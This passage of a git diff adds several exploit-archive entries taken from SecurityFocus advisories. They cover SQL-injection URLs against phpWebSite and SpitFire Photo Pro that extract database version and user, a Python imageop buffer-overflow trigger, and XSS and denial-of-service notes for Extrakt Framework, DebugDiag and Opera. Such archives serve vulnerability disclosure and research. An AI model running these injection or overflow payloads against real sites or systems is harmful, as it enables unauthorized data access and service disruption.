+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Extrakt Framework 0.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=
\ No newline at end of file
diff --git a/platforms/php/webapps/32553.txt b/platforms/php/webapps/32553.txt
new file mode 100755
index 000000000..a063c4bd8
--- /dev/null
+++ b/platforms/php/webapps/32553.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/32011/info
+
+phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+We don't know which versions of phpWebSite are affected. We will update this BID as more information emerges.
+
+NOTE: The vendor refutes this issue, stating that the vulnerable script has not been present in the application since either the 0.8.x or 0.9.x releases.
+
+http://www.example.com/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())--
\ No newline at end of file
diff --git a/platforms/php/webapps/32554.txt b/platforms/php/webapps/32554.txt
new file mode 100755
index 000000000..24f96ac2e
--- /dev/null
+++ b/platforms/php/webapps/32554.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32012/info
+
+SpitFire Photo Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--
\ No newline at end of file
diff --git a/platforms/unix/dos/32534.py b/platforms/unix/dos/32534.py
new file mode 100755
index 000000000..8a4276a9e
--- /dev/null
+++ b/platforms/unix/dos/32534.py
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31932/info
+
+Python's 'imageop' module is prone to a buffer-overflow vulnerability.
+
+Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable Python modules. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition.
+
+These issues affect versions prior to Python 2.5.2-r6.
+
+import imageop
+s = ''
+imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536)
\ No newline at end of file
diff --git a/platforms/windows/dos/32550.html b/platforms/windows/dos/32550.html
new file mode 100755
index 000000000..914d93c43
--- /dev/null
+++ b/platforms/windows/dos/32550.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31996/info
+
+Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+
+A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
+
+Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/32555.html b/platforms/windows/remote/32555.html
new file mode 100755
index 000000000..fd768036e
--- /dev/null
+++ b/platforms/windows/remote/32555.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32015/info
+
+Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.
+
+Opera Web Browser 9.62 is vulnerable.
+
+ Click me...(opera:config) Click me...(opera:cache) Click me...(opera:debug) Click me...(opera:plugins) Click me...(opera:about)
\ No newline at end of file